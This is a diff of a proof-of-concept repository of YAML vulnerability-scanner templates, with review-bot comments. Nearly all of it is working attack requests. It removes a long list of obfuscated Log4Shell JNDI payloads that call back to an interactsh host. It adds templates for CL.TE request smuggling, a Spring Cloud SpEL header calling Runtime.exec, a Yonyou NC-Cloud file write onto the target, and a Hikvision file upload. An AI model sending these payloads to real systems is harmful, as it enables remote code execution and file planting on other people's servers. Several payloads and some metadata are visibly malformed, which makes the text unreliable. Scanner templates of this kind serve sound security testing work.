@@ -37,169 +38,6 @@ http: - 'X-Wap-Profile: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Api-Version: ${jndi:ldap://{{interactsh-url}}/info}' - 'Host: ${jndi:ldap://{{interactsh-url}}/info}' - - 'X-Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Client-IP: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Remote-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Remote-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Remote-IP: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Remote-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Remote-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Remote-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Remote-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Remote-Addr: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Remote-Addr: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Remote-Addr: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Remote-Addr: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Remote-Addr: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Remote-Addr: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Remote-Addr: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}: 
${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Forwarded-For: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Forwarded-For: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Originating-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Originating-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Originating-IP: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Originating-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Originating-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Originating-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Originating-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'User-Agent: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'User-Agent: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'User-Agent: ${jndi:rmi://{{interactsh-url}}}' - - 'User-Agent: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'User-Agent: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'User-Agent: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'Referer: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'Referer: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'Referer: ${jndi:rmi://{{interactsh-url}}}' - - 'Referer: ${${lower:jndi}: 
${lower:rmi}://{{interactsh-url}}/poc}' - - 'Referer: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Referer: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'CF-Connecting_IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'CF-Connecting_IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'CF-Connecting_IP: ${jndi:rmi://{{interactsh-url}}}' - - 'CF-Connecting_IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'CF-Connecting_IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'CF-Connecting_IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'CF-Connecting_IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'True-Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'True-Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'True-Client-IP: ${jndi:rmi://{{interactsh-url}}}' - - 'True-Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'True-Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'True-Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'True-Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Forwarded-For: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Forwarded-For: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${lower:j}${lower:n}${lower:d}i: 
${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'Originating-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'Originating-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'Originating-IP: ${jndi:rmi://{{interactsh-url}}}' - - 'Originating-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Originating-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Originating-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Originating-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Real-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Real-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Real-IP: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Real-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Real-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Real-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Real-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Client-IP: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'Forwarded: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 
'Forwarded: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'Forwarded: ${jndi:rmi://{{interactsh-url}}}' - - 'Forwarded: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Forwarded: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Forwarded: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Forwarded: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'Client-IP: ${jndi:rmi://{{interactsh-url}}}' - - 'Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'Contact: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'Contact: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'Contact: ${jndi:rmi://{{interactsh-url}}}' - - 'Contact: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Contact: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Contact: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'Contact: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Wap-Profile: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Wap-Profile: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Wap-Profile: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Wap-Profile: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Wap-Profile: 
${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Wap-Profile: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}' - - 'X-Api-Version: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}' - - 'X-Api-Version: ${jndi:rmi://{{interactsh-url}}}' - - 'X-Api-Version: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Api-Version: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Api-Version: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}' - - 'X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}' - - 'X-Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'X-Remote-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'X-Remote-Addrldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'X-Forwarded-Forldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'X-Originating-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A 
Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'User-Agentldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'Refererldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'CF-Connecting_IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'True-Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'X-Forwarded-Forldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'Originating-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'X-Real-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 
'X-Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'Forwardedldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'Contactldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'X-Wap-Profileldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'X-Api-Versionldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'Hostldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}' - - 'X-Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'X-Remote-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'X-Remote-Addr: 
${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'X-Forwarded-For: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'X-Originating-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'User-Agent: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'Referer: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'CF-Connecting_IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'True-Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'X-Forwarded-For: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'Originating-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'X-Real-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'X-Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'Forwarded: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'Contact: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'X-Wap-Profile: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - - 'X-Api-Version: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' attack: clusterbomb matchers-condition: or diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml index 278b84146d..ddb83e064d 100644 --- a/poc/http/cl-te-http-smuggling.yaml +++ b/poc/http/cl-te-http-smuggling.yaml 
@@ -1,35 +1,37 @@ -id: CL-TE-http-smuggling -info: - name: HTTP request smuggling, basic CL.TE vulnerability - author: pdteam, akincibor - severity: Low -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - unsafe: true - matchers: - - type: dsl - dsl: - - 'contains(body, "Unrecognized method GPOST")' +id: CL-TE-http-smuggling + +info: + name: HTTP request smuggling, basic CL.TE vulnerability + author: pdteam, akincibor + severity: Low + +http: + - raw: + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Unrecognized method GPOST")' \ No newline at end of file diff --git a/poc/java/springForShell-CVE-2022-22963.yaml b/poc/java/springForShell-CVE-2022-22963.yaml index d04177443d..f28360d6a7 100644 --- a/poc/java/springForShell-CVE-2022-22963.yaml +++ b/poc/java/springForShell-CVE-2022-22963.yaml 
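Review bot: `severity: Low` stays capitalized on the new side while every other template in this diff uses the lowercase values (`medium`, `critical`, `high`); the documented severity values are lowercase, so write `severity: low`. The template still carries no `description:` or `reference:` — a one-line description of the CL.TE desync being detected and a link to the source it was derived from belong in `info:`, as the other templates here have. The first raw block also changes from `|` to `|+`, which keeps the trailing newlines of the first request and so changes the bytes sent; if that is intentional, note it with a comment above the block.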
@@ -1,46 +1,44 @@ id: CVE-2022-22963 info: - name: Spring Cloud - Remote Code Execution - author: Mr-xn,Adam Crosser + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt severity: critical - description: | - Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94 - tags: cve,cve2022,springcloud,rce + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 requests: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - 
"{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 - -# Enhanced by mp on 2022/05/19 + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml index cef49f23fa..653783158e 100644 --- a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml 
@@ -1,36 +1,43 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: yonyou-nc-cloud-jsinvoke-rce - author: pphua + name: Yonyou NC Cloud - Remote Code Execution + author: Co5mos severity: critical - tags: yonyou,nc-cloud,rce - reference: - - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA + description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. + reference: + - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" + tags: yonyou,rce + +variables: + str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} + - | - GET /{{randstr}}.txt HTTP/1.1 - Content-Length: 138 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + GET /{{str1}} HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - type: word + part: body words: - - "StringObject" - part: body \ No newline at end of file + - '5d8be7535d6383e99315739724e10fa7' + + - type: status + status: + - 200 \ No newline at end of file 
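Review bot: The first request still writes a file (`webapps/nc_web/{{str1}}`) on the target and nothing removes it, but the new `tags: yonyou,rce` line carries no `intrusive` tag and also drops the `nc-cloud` tag the old line had; use `tags: yonyou,nc-cloud,rce,intrusive`. The body matcher hard-codes `5d8be7535d6383e99315739724e10fa7`, which has to equal the `{{md5('yonyou-nc-cloud-jsinvoke-rce')}}` value written by the first request — I have not verified the digest — so a comment beside the matcher stating that the literal is that md5 would keep the two from drifting apart. The new description calls this an arbitrary file upload while the id and name say remote code execution; align the name with what the template actually checks.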
diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml index e86e8491d1..538f6fd6d5 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml @@ -1,19 +1,20 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability metadata: fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + http: - raw: - | - POST 